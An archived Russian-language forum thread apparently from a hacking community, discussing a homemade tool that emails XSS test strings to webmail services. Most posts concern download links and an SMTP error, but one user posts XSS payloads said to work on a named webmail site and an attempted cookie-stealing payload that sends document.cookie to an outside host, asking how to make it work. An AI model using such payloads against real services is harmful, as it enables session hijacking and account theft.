PDA

Просмотр полной версии : XSS mail Tester


LittleLamer
29.11.2004, 02:11
Зацени плиз мой XSS Tester:
http://sec-123.narod.ru/xss/XSSTest1_0.rar

Тестирует тело письма на известные ХСС.

Егорыч+++
30.11.2004, 00:11
Прикольно ничего не скажешь... Можно и у нас выложить если ты не против...

Algol
30.11.2004, 00:31
Проблема в том, что это будет работать только в том, случае, когда система пропускает теги, а этого практически никогда не бывает
Это все нужно оформлять не через Html теги а через Bb теги например (для форумов)

Да и еще OnERor пишется с двумя R

LittleLamer
30.11.2004, 16:22
Ну это пока тестовая версия, и она только для email-ов.
А за OnERor псб - торопился :)
На счёт выложить - попозже наверно, счас программа сыровата.

virgoz
30.11.2004, 20:48
интересная идея :)
сделаю себе такой...

LittleLamer
30.11.2004, 23:02
Изменил немного:
http://xsstest.narod.ru/XSSTest1_0.rar

madnet
14.12.2004, 23:31
Я пишу такой же, но для форумов с работай чарес прокси серверы и т.д, но не хватает информации - одному сложно искать, если у кого есть подборочки с багами и подробным описанием, скинь те плиз на dead-3000@tut.by - буду очень признателен.

LittleLamer
14.12.2004, 23:47
Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
P.s.: хотя я могу ошибаться ;)

madnet
15.12.2004, 01:06
Не понял тебя?

Algol
17.12.2004, 14:01
Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
P.s.: хотя я могу ошибаться ;)
Да, нужно что бы система тестировала прохождение кавычек, тегов, ключевых слов типа javascript в разных случаях, в разных тегах и т.д.

Егорыч+++
17.12.2004, 16:04
Да я кстати думаю что лучше такую систему вообще полностью онлайн сделать

SHiTS
17.12.2004, 16:43
в образовательных целях так сказать,чтоб такие юзвери как я могли трениться.
ток я пока в это тесте ниче не понимаю.ключевое слово "пока".

nc.STRIEM
18.07.2006, 00:04
где сейчас можно скачать XSSTest так как приведенные выше ссылки уже не работают??

Dronga
18.07.2006, 00:38
Смотри Faq к разделу.

MeXoN
10.02.2007, 04:43
Сылки работают. Зделай проще скопируй сылку и вствь в адресную строку своего браузера.

ya_mag
15.02.2007, 17:37
Прога супер!!! огромное спасибо!
вот только помагите правильно составить запрос... у меня что то нифига не получается :(
вобщем вот эта xss
<body onLoad=alert(2)>
и вот эта
<meta http-equiv=Refresh content=0;url=javascript:alert(4)>
работают на mail.gala.net
но никак не могу добится что бы мне пришли куки :( я делал вот так:
<body onLoad="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie>
вобщем объясните как эту xss юзать?

Phen1x
20.02.2007, 07:29
Так так, а как им пользоваться? :)

ya_mag
20.02.2007, 09:22
всё очень просто:) отправляеш письмо на свой ящик который хочеш проверить... и смотриш результаты:)

Miixxa
20.07.2007, 19:17
Приветсвтую!
Вот решил испробовать XSS тестер.
При завершении пишет постоянно:

Error in command: must be 250, but returned -->>
recived:
˜øš
sended:
QUIT

Error in command: must be 221, but returned -->>
recived:
˜øš
Socket closed
-------ERROR------
SMTP`session ENDed with ERROR : message not sended!!!
-----END_ERROR-----

Вот значит, вроде бы правильно все ввожу:
в строке
от: 66-66-66@mail.ru
кому: mpetrovsky@mail.ru
сервер: smtp.mail.ru
порт: 25
авторизация: USER: 66-66-66 PASSWORD: *********

запускаю, результат выше был описан.
что не так?